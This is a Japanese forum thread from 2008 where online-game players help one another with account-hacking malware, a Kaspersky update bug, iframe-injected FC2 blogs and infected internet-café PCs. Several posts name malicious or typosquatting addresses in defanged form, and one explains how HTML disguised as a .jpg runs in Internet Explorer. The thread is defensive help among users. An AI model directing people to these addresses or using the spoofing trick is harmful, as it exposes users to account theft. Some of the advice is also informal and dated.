#キャンセルとか教えてたぐらいで放置してたからな
こんなノート渡されて、やれることはやったと思うんだがどーよ。

欲しいのは対処法じゃなくて、ブログ系だけでこーなるのかどーかだったんだ
まぁ世の中、アップデートしてるのが普通だと思うんだが、中にはしてない奴も
いるんだなーということ。

334 名前:(○口○*)さん:08/04/19 22:29 ID:5fUrOern0
長期にわたってアップデートしてないWindows XP SP1で罠ブログを踏むと
どういう状況に陥るか理解できないの?

335 名前:(○口○*)さん:08/04/19 22:42 ID:eQqDh01e0
>>333
まともに応対するだけの価値がないことがわかった。

336 名前:(○口○*)さん:08/04/19 22:59 ID:me5qBwY/0
俺ならノートPCを投げ捨てて終わりにする
1分もかからず解決だ

337 名前:(○口○*)さん:08/04/19 23:40 ID:yS6BiP+t0
Security
Empty

の略だったんだよぉぉぉ!1!!!1

誰かいい略称を頼む

338 名前:(○口○*)さん:08/04/19 23:42 ID:WV5GzwjF0
おぉ、まだやっとったんかw

339 名前:(○口○*)さん:08/04/19 23:44 ID:xphBn+iy0
>>333
捨て台詞はいいから早くそのノーと捨てて来い

340 名前:(○口○*)さん:08/04/20 00:24 ID:OV/0sayVO
カスペ使ってるやつ南無、ついでに俺も南無

341 名前:(○口○*)さん:08/04/20 00:25 ID:gM7YZn650
>こんなノート渡されて、やれることはやったと思うんだがどーよ。

まともに駆除出来るかどうか判らん状態でやれる事なんざ、再インストールしかない。
リカバった所で、ゴーストのイメージが汚染されてる恐れもあるし、そのままだと
即再発する。

>欲しいのは対処法じゃなくて、ブログ系だけでこーなるのかどーかだったんだ

「ブログ系だけでこーなるのかどーか」なんてちょっとセキュリティを齧れば判ること。
ましてや「それなりの」なんて自負してるネットワークSEなら、聞かなくても判るだろ。

そのノートが本当に他人のかどうか知らんけど、なぜ>333のレスの後もツッコミが
入ってるのか、よく考えた方がいい。

342 名前:(○口○*)さん:08/04/20 01:58 ID:TwEhw0Wm0
自分で管理できてるものじゃない上に、思い当たるような原因もなし、
そんな条件の切り分けが出来てない状況で、
特定しようなんて、マゾか馬鹿のどちらかしなないと思うが。
さらに、そんな状況で技術的な話をしましょうなんて、
SEどころか人間扱いされなくても文句言えないぞ。

343 名前:(○口○*)さん:08/04/20 02:41 ID:24ALICNa0
>>340
?

344 名前:(○口○*)さん:08/04/20 03:14 ID:rt8I2chq0
セキュ板のカスペスレチラ見したらなんかあったっぽく荒れてるね

345 名前:(○口○*)さん:08/04/20 06:21 ID:1rmhJ8CE0
【      気付いた日時          】 今しがた
【不審なアドレスのクリックの有無 】 踏みました
【  アドレス   】ragnarocks■com/
【     OS    】WindowsXP Home SP2
【使用ブラウザ 】Opea 9.27
【 アンチウイルスソフト 】 avast! 4.8
【 ウイルススキャン結果】 カスペルスキーオンラインスキャンで検知なし
【テンプレの参考サイトを読んだか】 Yes
【hosts変更】無
【PeerGuardian2導入】無
【説明】
PCを買い換えたので、見た目シミュレータのRagnarocks.comをブックマークするため「Ragnarocks.com」でググり、
一番上にあったこのアドレスを開いてしまった
英語なせいでよくわからないが、単にドメインを売っているサイトだろうか…?

346 名前:(○口○*)さん:08/04/20 07:10 ID:MWtvt7xg0
自分の管理している環境ではない→普段どういう使い方をしているか全てを把握できている訳ではない。
この状況で、踏んづけたトロイ以外には何も入っていないという保証なんて誰ができようか。
そもそも、踏んだのは>>315本人なのか、それとも友人とやらなのか?

こんな不確実な状況で、少なくても自分なら、(誰が何時の時点で取得したかも判らない)Ghostイメージからの復元なんて考えない。
更のOS、ノートPCならリカバリメディアや領域からのクリーンインストール、併せてWUなどのセキュリティアップデートを提案するよ。
そういった、リスクを相手に納得させ、承諾させる過程や行為。それと、納得しないなら匙を投げるのもスキルのうちだよな。

そこから先の、個人的な検証や解析とやらは、検疫した検体で好きにすればよい。
但し、他人に迷惑を掛けない範囲で。

347 名前:(○口○*)さん:08/04/20 12:05 ID:OV/0sayVO
今カスペでバグ発生中。注意。

348 名前:(○口○*)さん:08/04/20 12:15 ID:OV/0sayVO
常時接続などで長時間・期間PC起動している人
メモリを大量消費するアプリ使用後・作業後は
暇を見つけては時々カスペをいったん終了・再起動で
十分なメモリ・リソースを開放してあげましょう。

349 名前:(○口○*)さん:08/04/20 12:17 ID:zLfdgL6r0
>>345
ドメインの支払いが滞ったとかでドメイン業者の広告になってるだけだろ。

350 名前:(○口○*)さん:08/04/20 12:52 ID:4XMEvjoi0
>>347,348
どんなバグ?公式に載ってないようだけど

351 名前:(○口○*)さん:08/04/20 12:59 ID:4XMEvjoi0
ごめん、セキュ板みて自己解決した
Windows全体が突然文字消えとかして画面バグるやつか
うちでも昨日からなってて別の原因だと思ってた。カスペのせいだったのか

352 名前:(○口○*)さん:08/04/20 13:11 ID:OV/0sayVO
公式にはまだ乗ってない模様。XPSP2は完全NGほかのでも多数報告ありでKIS使用者起こる。

対策はあるが目眩まし程度なのでカスペの対策待ちといったところです。

353 名前:(○口○*)さん:08/04/20 13:14 ID:OV/0sayVO
発症条件は3日前の再起動の更新です!

354 名前:(○口○*)さん:08/04/20 13:18 ID:MWtvt7xg0
KISの問題はリソースリークの症状に似ている感じがするな。
ユーザーが増えること自体は悪くないのだけど、トラブル発生時に問題が拡大するのと裏腹か。

>>345
多分、
誤) ragnarocks■com
正) ragnarockcs■com
なのではないかな。
後者は少なくとも、それっぽいサイトに辿り着けた。中身の精査まではしていないけど。

人間の記憶なんて怪しいものだし、時としてtypoや思いこみに起因する間違いも起こりやすい。
今は幸いにして、USBフラッシュメモリが破格で売られている。4GBで2000円以下とか、良い時代になったものだ。
Operaなら、%USERPROFILE%\Application Data\Opera\Opera\profileフォルダをコピーしておけば、ブックマーク丸ごと
他の環境に移し変え可能。

355 名前:(○口○*)さん:08/04/20 13:35 ID:gM7YZn650
>353
その更新掛けたけど、言われてる症状は出てないな。
XP Pro SP2な環境なので、出るはずなんだが。

しかしセキュ板は相変わらずの状態で情報検索がしにくいのが困る。

356 名前:(○口○*)さん:08/04/20 13:53 ID:OV/0sayVO
多分、10時間起動しても出ないやつもいるし、PCによりけりってところだと思いますよ。俺も2時間ラグナやってるくらいじゃあ問題なかったし 

ただ、今ないからって油断は禁物ってことかな

357 名前:(○口○*)さん:08/04/20 14:09 ID:kf7UeqiJ0
漏れは20時間起動してたが問題なかったな
まあスペックによりけりな気がするが

358 名前:(○口○*)さん:08/04/20 14:39 ID:TlopJMBB0
カスペの件、朝起きたらなってた。昨日の夕方に再起動してたので12時間前後で発生か。
直前に入れ替えたカタリスト8.4のせいかと思ってたよ。

WinXP SP3(RC3) / RadeonHD3870 / 3.25GB / Athlon64 X2 4600+

359 名前:(○口○*)さん:08/04/20 14:45 ID:TlopJMBB0
総合スレ608
nice bot.

次からはセキュスレ逝けってコメントついてんだから、お前さんの誘導は蛇足だ。

360 名前:(○口○*)さん:08/04/21 00:23 ID:GwLYdq0o0
もうあっちのスレいらないだろ

361 名前:(○口○*)さん:08/04/21 00:30 ID:zW3a6FZc0
総合スレ9-609〜610

|609 (^ー^*)ノ〜さん sage 08/04/20 18:58 ID:sIMAMXhj0
|Nice bot.

|610 (^ー^*)ノ〜さん sage 08/04/20 23:19 ID:EaTOsuLN0
|Nice bot.

人の振り見て我が振り直せ。お前さん方も優秀なBOTになってるじゃねーか。

362 名前:(○口○*)さん:08/04/21 00:35 ID:HFJF9SLJ0
しつこく誘導張るのもアレだが、糞レスしておいて誘導キチガイとか抜かす奴も同程度だ

363 名前:(○口○*)さん:08/04/21 00:36 ID:GCPek+8A0
あっちのスレがいらないというか、いる場所が逆のような気がする
割と貴重な話が出ることもあるこのスレが、なんでらいぶろにあるのかと
管理者側で対策されれば消える・個別案件ばかりで全体的な話にならない垢ハックの方が、
長く置いておく必要性が本当にあるのかと

だから垢ハック対策は適当でいい、とは言わないが、
向こうのスレの現状とか見てると、どうももやもやする

364 名前:(○口○*)さん:08/04/21 00:45 ID:13XbZQY40
>>361
そういう貴方様もあっちの事をこっちで蒸し返す高性能BOTですね
>>284も貴方様でしょ?
確信犯でやっているのに人の振りして治せって言っても
馬の耳に念仏じゃな

365 名前:(○口○*)さん:08/04/21 01:14 ID:T8LA4Hfz0
誘導張った奴に対してお前はBOTかという皮肉なんだろうね。
どっちも気持ちはわからんでも無いが、本当にあそこの状態はどうにかせんとあかんなぁ。

366 名前:(○口○*)さん:08/04/21 01:15 ID:qCvvxqSR0
もう長いこと変なのに目を付けられてるしなんとかしないとね
あれの所為で馬鹿がネタとしてレス付けたりもしてるし

367 名前:(○口○*)さん:08/04/21 10:11 ID:1dZ/j7CH0
向こうのスレは粘着君のお陰で機能不全に陥ってるとしか。
幸い(?)危険URLの報告は減少してるし、全てこちらで扱ったほうが良いような気がする。

もしこの手のスレがLiveRoにしかないのが問題というなら、(スレタイは考えるとして)
セキュスレを向こうに持っていく、というスタイルにするとか。

368 名前:(○口○*)さん:08/04/21 21:35 ID:M1AaPZi+O
カスペバグ解決したみたいです。カスペルスキーユーザーは直ちに更新をすることをオススメいたします。これで解決するはずです

スレ汚しすまん。では健闘を祈る。

369 名前:(○口○*)さん:08/04/21 21:36 ID:wVo+IcMH0
カスペが定義の更新処理で落ち着いたみたい

370 名前:(○口○*)さん:08/04/21 22:04 ID:z1RQI+Nx0
更新したあとはカスペを再起動するといいようだ

371 名前:(○口○*)さん:08/04/22 02:07 ID:GuH70YQI0
セキュスレはあの有様だし、こっちで聞いてみる
カスペのMP1って入れてる?
最初配布されたやつが不具合あってダメだというんで入れてなかったんだが、
今回再配布されたやつはマシになってるのかな

372 名前:(○口○*)さん:08/04/22 02:51 ID:gnmyKVps0
>371
初回版のMP1でも問題が出てなかったのでそのまま運用。
修正版のMP1が出たときに切り替えたけど、共に問題なし。

初回版でも無印より良くなってると感じてた。

373 名前:(○口○*)さん:08/04/22 14:10 ID:yyrxcsMq0
エラースレからコピペ。これでようやく一安心。

484 (^ー^*)ノ〜さん sage 08/04/22 13:37 ID:BQgXCEOo0
>>479
http://www.just-kaspersky.jp/
公式発表来たね。以下お知らせコピペ。

======================
2008.04.22
Kaspersky Internet Security 7.0において、4/17夜間に配信したドライバの更新に不具合があり、
一部の環境ではWindowsの表示が不正になったり、動作が遅くなる現象が4/17以降に確認されています。
4/21 20:00以降の定義データベースの配信で修正しておりますので、現象が発生しているお客様は、
最新の定義データベースの適用をお願いいたします。お客様にはご迷惑をお掛けして申し訳ございません。
現象が解決しない場合は、カスペルスキー専用サポートセンターにお問い合わせください。
======================

374 名前:(○口○*)さん:08/04/23 00:41 ID:L+CdsQIiO
MP1で不具合とか不満ないやつは希少種。

375 名前:(○口○*)さん:08/04/23 00:44 ID:8InFobiz0
>>374
具体的にどんな不具合が出てるのかkwsk

376 名前:(○口○*)さん:08/04/23 08:58 ID:/EVN7uab0
質問させて頂きます
OS:vista prenium
windows updateは最新でプレイしています

4/22のメンテ後寝露店をさせていたところ
不正変更の監視:拒否数1
NtUserSetWindowsHookEx を拒否しました云々とでました
RagEXE.EXEらしいのですが、先週までは何も出ず4/22のメンテ後
ROにinしてるとでるようです。

ウイルスバスター2008使用ですが、nPro関係の誤動作かなにかでしょうか?
ROをやる上でやっておくべきことなどありましたら
ご存じの方いらしゃいましたらアドバイスいただけますか?
よろしくお願いします。

377 名前:(○口○*)さん:08/04/23 10:19 ID:rRUiBIzi0
>>376
NtUserSetWindowsHookEx で ぐぐってみるといくつか情報があるようです。
ウィルスバスターのイベントに残ったログをみて
対照ファイルが問題ないようでしたらバスターの設定で
それについてスルーするように設定すればいいようですよ?

378 名前:(○口○*)さん:08/04/24 12:38 ID:DT7FJH5rO
今までのカスペよりさらに重くなったり、回線速度が半端なく下がったり、意味不明なエラーにあったりくらいかな これは、全く起こらない人もいるし試してみるといいさ 気になるなら

379 名前:(○口○*)さん:08/04/24 19:01 ID:0rMdY5Nf0
単にふと思っただけではありますが質問

垢ハックのウィルスには、キーロガータイプとパケット盗聴タイプと2種類あると思いますが、
もし何の関係も無い単語から変換されるように予め辞書登録してあり、その変換によって
IDパスを入力しログインした場合、キーロガータイプのウィルスによってはIDパスは盗まれませんか?
と言うかキーロガーの仕組みをよく分かっていないんですが
キーロガーとは純粋にキーボードのキーを押したログのみを取るものなんでしょうか。

IDパスを辞書登録と言うのは別の面で色々と問題があるだろう事は知っているので
辞書登録をもってウィルス対策にしようとか考えている訳ではないですが、よろしくお願いします。

380 名前:(○口○*)さん:08/04/24 19:09 ID:GTUenoth0
キーボードとIMEの間に割り込んでるなら抜き取れない可能性もありますが、
まず間違いなく無駄です。

381 名前:(○口○*)さん:08/04/24 19:23 ID:KbuynQYN0
できの悪い敵には効果があるかもしれないけど、相手はあらゆる手段で
金品やそれに繋がる情報を奪い盗ろうとしてくるわけで……

382 名前:(○口○*)さん:08/04/24 20:50 ID:0rMdY5Nf0
>>380-381
キーロガーもそんな単純じゃないって事ですね。
ありがとうございました。

383 名前:(○口○*)さん:08/04/24 21:41 ID:rkHYDVbA0
KEYKatcherやKeyGhostのように、キーボード-PS2端子間に咬ませるハードウェア型には一定の効果があるが、ソフトウェアの
場合、大抵はIMEからメッセージとして送られた文字列そのものも見ているだろうから、効果は薄いだろう。

384 名前:(○口○*)さん:08/04/25 08:19 ID:7iNQ5eC70
>>377さん

風邪で寝込んでいてお礼が遅くなり申し訳ございません
レスどうもありがとうございました
参考にさせていただきます

385 名前:(○口○*)さん:08/04/25 18:06 ID:gsMgelCR0
スパイウェア対策機能が追加された「AVG Anti-Virus Free Edition」v8.0が公開
http://www.forest.impress.co.jp/article/2008/04/25/avgantivirusfree8.html

386 名前:(○口○*)さん:08/04/25 18:25 ID:XfRpdjLR0
FC2は水面下で揉み消しを行っていたのだろうか?

265 名前:既にその名前は使われています[] 投稿日:2008/04/24(木) 22:21:20.93 ID:kXzuopcm
FC2、今頃になって一部の被害ブログ主からの問い合わせメールに返答かえしてるのか?
戦士スキーのブログにそれらしき記述がある。

ーーーーー抜粋ここから
FC2に出していた問い合わせメールの返信内容。
(中略)
何の報告もないまま一週間が経過したので返事を催促したところ
・iframeタグが有害であるため、即日運営側にて削除したこと
・当該改竄は中国IPからの不正ログインであること
・対策以前の改竄で、今回の対策完了によりHPスペースも安全であるとのこと
・iframeタグの削除が連絡無しで行われたことに対する謝罪
etcが丁寧に返信されてきました。
(中略)
マスメディアのように一斉にFC2を叩いていてもしょうがないですよ、というお話。
ーーーーーここまで
事実上利用者数をアメーバに抜かれて引き止めに必死とも見えるし、人の噂も何とやら狙いかもしれない。
>・iframeタグが有害であるため、即日運営側にて削除したこと
では今まで何してたよ?虫がよすぎる返答がFC2らしい。

266 名前:既にその名前は使われています[] 投稿日:2008/04/24(木) 23:15:23.71 ID:6cy1p+Fd
連絡なしでiframeを消すって、一見ナイス判断に思うかもしれないが
その裏でいったいどれだけのブログを修正してきたんだろうな。
どうせiframeが仕込まれてたのがわかると移転騒ぎが大きくなるからコッソリ直してたんだろ?
そうでなきゃ利用者が問い合わせるまでダンマリとかありえねぇ。

387 名前:(○口○*)さん:08/04/25 22:54 ID:M4z1+1ki0
iframeタグが有害・・・・

ニコニコ動画のタグに確か…

388 名前:(○口○*)さん:08/04/26 01:58 ID:Nqkmyrdp0
>>385
今7.5使ってるけど、8.0に再インスコするしかないのかしらん?

389 名前:(○口○*)さん:08/04/27 01:23 ID:anLYg7790
自己解決
上書きインスコできますた

390 名前:(○口○*)さん:08/04/27 18:43 ID:KZ7qTREw0
RealPlayer11が11.0.3になってた。
こっそりバージョンアップするのやめてくれよ…。
更新の確認しても出てこないし。

391 名前:(○口○*)さん:08/04/27 22:04 ID:xJIvBCPD0
ネカフェの下調べに行ってきた。
全国チェーンのネカフェで 再起動すると中身が削除されるシステムらしいが
念のため電源切って入れて(not再起動)
kasper onlineスキャナぽちっとな。

…ウィルス感染1
疑わしいコンテンツ 山盛り
…地方の怪しいところじゃなくて全国チェーンの割と有名どころだったんだが…
動揺してウィルス名メモしてくるの忘れた
3倍でも恐くて行けないなぁ

392 名前:(○口○*)さん:08/04/28 01:13 ID:20l2bpzA0
個人的に3倍で普段行かない人もネカフェ行って
ぷち垢ハック祭りになるのを勝手に予想してる

393 名前:(○口○*)さん:08/04/28 01:57 ID:KGxiLf0e0
個人的じゃなく発表合ったときから散々言われてることなんだが
今更何なんだ?

394 名前:(○口○*)さん:08/04/28 02:31 ID:hOBjDZTh0
>>391
事実確認情報として、店舗名を挙げて貰えないと有益な情報というには弱い気がする。
あと、店員にははっきり伝えたんだろうな。言わないと、改善されないぞ。

395 名前:(○口○*)さん:08/04/28 03:00 ID:z7fuHfBX0
下調べしたかっただけで改善は目的じゃないんじゃないの
>>391に改善するように動けと言うのも身勝手に思える

396 名前:(○口○*)さん:08/04/28 21:46 ID:/q8yg+vX0
>>391
…店員さんには言わなかった…
液晶もたまに黄色く変色したり変だったのですが満杯みたいでチェンジできなかった+騒ぎになると時間かかるし面倒なのでイヤだった。というエゴの塊です。

ハイスペックタイプじゃなくてビジネスブースの方だったからチェックされてなかったのかもとか
そのお店で使ってる再起動すると中身が消えるシステムが誤認識されてたのかもしれないし(そういうのあり?<kasper)

やっぱりウィルス名とその他の怪しいのをきちんとメモしておけば良かったですね…
「重要な部分のみ」では引っ掛からず「Cドライブ全体」だとぼこぼこ出てきました。
kasper DLするのに1時間(回線速度10M出てたみたいなんですが異様に遅かった。冗談抜きで1時間)チェックするのに1時間かかってしまったので疲れ果てて帰ってしまいました。正直あそこはもう行きたくないです…

具体的名は営業妨害ニダと言われると困るので上げません…ごめんなさい。
ただ、(今まで散々言われていたことですが)ネカフェは大きいチェーン店でも危ないよ、という一例を雑談として。

対策として
●1dayなら家で課金してから行く(アトラクションパスは抜かれないで済む)
●ログイン前にkasperskyなどonlineチェッカーでちゃんとチェックしてから

●キャラごとに数字パスワードを変えておく
●ログインするのは必要最低限のキャラのみ
●お財布キャラに重要な装備持たせ、お財布キャラではログインはしない
●帰宅後すぐにログインIDを変更する

くらいしか対策思いつかないなぁ

397 名前:(○口○*)さん:08/04/28 21:47 ID:/q8yg+vX0
ってなに自分にれうしてんのorz
自分が391です…

398 名前:(○口○*)さん:08/04/28 22:52 ID:WMt+YoGt0
>>396
注意喚起のために店名も書いてほしいぞ
名前の一部伏せるとかさ

399 名前:(○口○*)さん:08/04/28 23:58 ID:h1UP8bQc0
すみません、垢ハックURLをマヌケにも踏んでしまいました。
URLを調べてみると、真っ黒です。
そのサイトを開いたブラウザはFireFoxで、表示は真っ白。
ソースを見るとVBScriptで記述されてました。
FireFoxはVBScriptをサポートしていないと公式に書かれていますが、
大丈夫でしょうか?

ノートンのスキャンでは検出できず、現在Ad-AwareとSpybot、
カスペルスキーのオンラインスキャンを走らせています。

400 名前:(○口○*)さん:08/04/29 00:15 ID:wGSg/i/y0
すみません、相談用のテンプレに今気がつきました。

【      気付いた日時          】 08/04/28 23:50
【不審なアドレスのクリックの有無 】有
【  アドレス   】www■skywebsv■com/Blog/index1■htm
【     OS    】WindowsXP Home SP2
【使用ブラウザ 】FireFox 2.0.0.14
【WindowsUpdateの有無】自動更新
【 アンチウイルスソフト 】 NortonInternetSecurity2008
【その他のSecurty対策 】 Spybot, Ad-Aware SE
【 ウイルススキャン結果】 ノートンで未検出
【テンプレの参考サイトを読んだか】 今から読みます
【hosts変更】無
【PeerGuardian2導入】無
【説明】
ソースを見るとVBScriptで記述されてました。
FireFoxはVBScriptをサポートしていないと公式に書かれていますが、
大丈夫でしょうか?

401 名前:(○口○*)さん:08/04/29 01:08 ID:D4J9YuiA0
>398
うーん…店名はどうのよりもやっぱり

ネカフェでやるなら先にウィルスチェック汁 だね。


…GW中は+100円になるところとだけ言っておく。

402 名前:(○口○*)さん:08/04/29 03:44 ID:MOe0UZ6X0
それ公認ネカフェとして存在が間違ってるんだから
名前出すのが嫌ならしょうがないが、せめてヘルプデスクあたりから苦情流してほしい
でないと、次の別のうっかりさんがひっかかってしまう可能性があるから…

403 名前:(○口○*)さん:08/04/29 09:10 ID:D3kiuWhO0
全ての店に危険の可能性があるいじょうひとつやふたつ店名だしても意味ないんじゃね。
それに店名出して万が一訴えられると、迷惑こうむるのは俺らじゃなくてらいぶろの管理人だし。
伏せ字にすりゃあ許されるってものでもない。

ヘルプデスクに苦情はやっておくべきだとは思う。

404 名前:(○口○*)さん:08/04/29 15:45 ID:hwe9PTw60
>>399
VBScriptはIEでしか動作しない。
<script>ほげほげ</script>みたいにtypeやlanguage属性無しだと
見分け付かんけど、その辺は大丈夫?

405 名前:399:08/04/29 17:57 ID:wGSg/i/y0
>>404
返答ありがとうございます。
ソースチェッカーで確認したところ、exeをダウンロードさせるコードは
language属性でVBscriptが指定されていました。
ノートン、Ad-ware、Spybotおよびカスペルスキーのオンラインスキャン
でのフルスキャンの結果は、全て問題なし。
念のため、安全なPCからパスワードを変更後、PG2を導入しました。
PG2がブロックしている形跡があるということは、
やはり感染の疑いがあるということでしょうか?

406 名前:(○口○*)さん:08/04/29 18:19 ID:hwe9PTw60
>>405
んじゃ動いてないね。無関係なんじゃね? Wikipedia(韓国サーバ)とか。
ブラウザのキャッシュにはそのscript込みのファイルが入っていて
それを検知するかもしれんのでキャッシュは削除しておくこと。

407 名前:399:08/04/29 18:32 ID:wGSg/i/y0
>>406
キャッシュ等は全てクリアしました。
PG2がブロックしたIPの中に、危険ドメインリスト入りしている
www■ahwlqy■comがあったため、もしかして?と思い書き込みました。
ロストすると致命的となるものを退避させ、しばらく様子を見ようと思います。
ありがとうございました。

408 名前:(○口○*)さん:08/04/29 18:56 ID:FRruey6G0
また、どっかの失効したドメインをそのアドレスと検知してるだけじゃねーの?

409 名前:(○口○*)さん:08/04/29 23:50 ID:wkfkAXcH0
「Lhaplus」に新たな脆弱性、ZOO形式の展開時にバッファオーバーフロー
ttp://internet.watch.impress.co.jp/cda/news/2008/04/28/19388.html

zoo形式は殆ど使われてない(と思う)から影響薄いだろうけど。

410 名前:(○口○*)さん:08/04/30 10:38 ID:qdj+pN9H0
マイクロソフト、「XP SP3」の提供を延期--未対応の問題発見で
ttp://japan.cnet.com/news/ent/story/0,2000056022,20372359,00.htm?ref=rss

だそうで。

411 名前:(○口○*)さん:08/05/01 10:44 ID:M+OY4Ljq0
【      気付いた日時          】 4月28日
【不審なアドレスのクリックの有無 】 踏みました。Chaos GVG Histryにて。名言集?だったか
【  アドレス   】ftrrdey■blog17■fc2■com
【     OS    】WindowsXP Home SP2
【使用ブラウザ 】IE7.0
【WindowsUpdateの有無】確か2週間くらい前。自動更新にしてるので最新のはず…
【 アンチウイルスソフト 】Avira AntiVir
【その他のSecurty対策 】 なし
【 ウイルススキャン結果】アドレスを踏んだ瞬間に検出。パニックになっていたのでTrojanで始まる以外忘れてしまったorz
【テンプレの参考サイトを読んだか】Yes
【hosts変更】なし
【PeerGuardian2導入】なし
【説明】
風邪でぼんやりした頭で放置Wikiを覗いたらものの見事に改ざんURLを踏んでしまいました。
即座にAvira AntiVirが反応したのですが、
実はこのソフトは海外に住んでいた時にPC修理店で入れてもらったもので、
日本語での使い方を読んでいませんでした。
パニックになっており、使い方を確認することも頭に浮かばず、
慌てて「Delete」をクリック。
即座に別PCで全てのパスを変更し、
同時にカスペルキーオンラインスキャンをかけました。
カスペルでは検出されなかったのですが、Avira AntiVirが日本語でない不安から、
カスペルトライアル版にセキュリティソフトをシフト。再びスキャンをかけるも、検出はされず。
また、Spybotも導入し、検出されたスパイウェアを全て削除。
セーフモードでもサーチしましたが検出されず。
最後にPeerGurdian2も導入し、リネ資料室にあるリストを全て登録しました。

100%の為にはクリーンインストールしかないのは勿論承知していますが、
今この状態で安全度はどのくらいになるのでしょうか?
アドバイス頂ければ嬉しいです。よろしくお願いいたします。

412 名前:(○口○*)さん:08/05/01 11:26 ID:v2YoNgpJ0
安全度って。。。

/^o^\

413 名前:(○口○*)さん:08/05/01 11:48 ID:aOtI+iHM0
そもそもパーセンテージを求めるのが間違い。
全か無か、しかありえないわけだから、総じて100%か0%にしかならん
んでこの歴代スレ見てもらえば判る通り「踏んだ可能性があるなら絶対安全とは言えない」のだから
とるべき手段は……もうわかるな?

ちなみにPeerGuardian2は感染後の治療処理システムじゃない
予防に作用するためのシステムだ(感染後にまったく意味が無いわけではないけど)。

414 名前:(○口○*)さん:08/05/01 18:03 ID:LRFfzP+C0
まぁ、今回はAntiVirがきちんと防いでる訳だが。敢えて外しちまうのはなんでかなー。
個人的には、AntiVirを選択した修理店GJだ。

だが、修理に出して、アンチウィルスソフト入れてよこすってことは・・・・・・・・・・・・・・・・・・・・
・・・・・・・・・OS入れなおし+セキュリティソフト導入からやっとけよって判断されたってことだろ。
ここで診断頼んでも、その修理店と診断結果は同じだぜ。

やってる対処はOKだが、それ以前の自己責任の範疇のところがどうなってるかは知らんわ。

415 名前:(○口○*)さん:08/05/01 18:51 ID:hi251b5B0
パソコンを家電感覚で扱う事が、まだまだリスクの高いことの証明みたいな事例だな。
それと、PC絡みで出てくる英語なんて、決まり切った単語程度しか使われていないから、落ち着いてGoogle先生に投げ込めば
大体のニュアンスは掴める。
このあたりは、ウイルス以外にも広範的に通用する要素なので。

416 名前:411:08/05/01 18:55 ID:M+OY4Ljq0
アドバイスありがとうございました。
色々と書き方が悪く、ご不快な思いをさせてしまい、申し訳ありませんでした。
パーセンテージを求めていたわけではなかったのですが、
シロかクロ、という2択以外の結果を求めていたのかもしれません…。
皆さんのお言葉を聞いて、目が覚めました。
以後、心を入れ替えて行こうと思います。

>>414
仰る通り、修理前は安全対策意識が欠けており、
セキュリティにあまり頭を回していませんでした。
(修理に出したのはHDDの故障で、修理というかHDDを交換しました。
セキュリティソフトはご好意で入れて頂いていたようです)
AntiVirを外したのは、ソフトが全てドイツ語だったため、
いざという時に言葉の意味を間違えてしまったらまずい…と思ったためです。
(ドイツ語は出来ますがそれこそ100%ではないので)

今回のことで自分のセキュリティ認識の甘さを痛感しました。
今後、自戒を心がけます。

417 名前:411:08/05/01 19:07 ID:M+OY4Ljq0
>>415
そうですね…ここに相談するまで、まさに家電感覚でした。
我が身に降りかかってようやく恐ろしさに気付くとは…。
ウィルス検出からここに相談するまで、完全にパニック状態で、
落ち着いた対処が全く取れていませんでした。
今になってようやく頭が冷えた感じがします。不安なら最初からPCまっさらにするべきですよねorz
ちなみにAntiVirを外したのは、前述の通り言語が全てドイツ語だったため、
今後の使用で意味の取り違えなどを起こしてはまずいな、と思ったためでした。
この辺りも私の勉強不足によるものですね…。

418 名前:(○口○*)さん:08/05/01 21:24 ID:LtcQXYn50
>>411
AntiVirは英語版も有るがカスペを購入する気ならその判断で良かろう。
有料の場合のサポートがどれだけあるか、と言われるとそう大差ないと答えるしか
ないが、その差はPCに不案内な人にとっては大きな意味があるから。

419 名前:(○口○*)さん:08/05/02 13:52 ID:qkwogxDs0
ttp://www.itmedia.co.jp/news/articles/0805/02/news019.html
オンラインゲームの通貨で資金洗浄? 携帯電話で実行するマルウェア出現

色々やるなあいつらは・・・

420 名前:(○口○*)さん:08/05/02 19:34 ID:rZJMo+4o0
今日、公認ネカフェへ行ってきました。
カスペのオンラインをポチっとな・・・。
感染1 trojan-Downloader.Win32.Small.dqf となっていました。
どうも調べてみるとCAVAL ONLINEというゲームのnProを誤検知しているんじゃないか?
と思ったのですが、チキンなもので今日は諦めて帰ってきました。

明日もう一度行ってCAVALをアンインスコしてスキャンかけてみます。
オレの6時間・・・。

421 名前:(○口○*)さん:08/05/02 21:02 ID:qkwogxDs0
画像ファイルなどについて質問です。
「JPGなどはヘッダを見る」というような事を前に見たのですが、
画像ファイルをメモ帳などで開いた時の JFIF などで判断すると言う事であっていますでしょうか?

422 名前:(○口○*)さん:08/05/02 21:46 ID:y5o3XgcC0
>>421
>JPGなどはヘッダを見る
URLが.jpgで終わっていて、サーバがimage/jpeg(これは画像だ)と
言っているにもかかわらず、IEは中身がHTMLならHTMLとして表示する。
本来は画像しかおけないはずのアップローダに、IEにとっては
危険なjpg偽装HTMLを仕込むことができる。

文脈にもよるから断言できないけど、たぶんこの話だと思う。

423 名前:(○口○*)さん:08/05/03 00:21 ID:76FYovKp0
ID変わってしまいましたがありがとうございますー

424 名前:(○口○*)さん:08/05/03 02:44 ID:yjTSHswH0
場違いな質問かもしれませんが・・・(´・ω・`)

IFRAME問題でFC2から忍者ブログに乗り換えたものですが、
忍者側に問い合わせたところこちらでもIFRAMEタグは使用可能ということでした。
現在被害の殆どはFC2に集中しているという事ですが、
忍者ブログで被害にあったケースもやはりあるのでしょうか?

そして>>386氏の

・iframeタグが有害であるため、即日運営側にて削除したこと

は、あくまでもタグを削除しただけであって、IFRAMEそのものはまだ使えるという事ですよね?

ちなみにiframe 要素を表示しない設定でブラウザやメールソフトを使用する事ができれば
ウィルスには感染しないのでしょうか?

チキンな漏れに御教授お願いします(´・ω・`)

425 名前:(○口○*)さん:08/05/03 05:23 ID:h93t2wCY0
tp://www■netgamerjp■com/wiki/ ,

これって垢ハク?すっごいクリックした

426 名前:(○口○*)さん:08/05/03 06:17 ID:XtnwYLML0
※※※ このスレは『勇気が無くて見れないサイト解説スレ』ではありません ※※※

427 名前:(○口○*)さん:08/05/03 07:05 ID:t0twUnWa0
>425
それって、すっごいアカハックアドレス。
テンプレ読んで処置するがよろし。


ちなみに冗談でも何でもなく、それ本当に危険アドレスだから。
疑うならまとめサイト(臨時)とかのhostsを見てくればいいよ。

428 名前:(○口○*)さん:08/05/03 07:14 ID:h93t2wCY0
ありがとうございました

429 名前:(○口○*)さん:08/05/03 07:20 ID:6aON5dqb0
※※※ このスレは『勇気が無くて見れないサイト解説スレ』ではありません ※※※


最低限症状ぐらいかけ。

430 名前:(○口○*)さん:08/05/03 07:36 ID:pJPYpSyO0
typoを狙ってるから、危険アドレスとして知らなくても
怪しい怪しくないでいえば怪しいなw

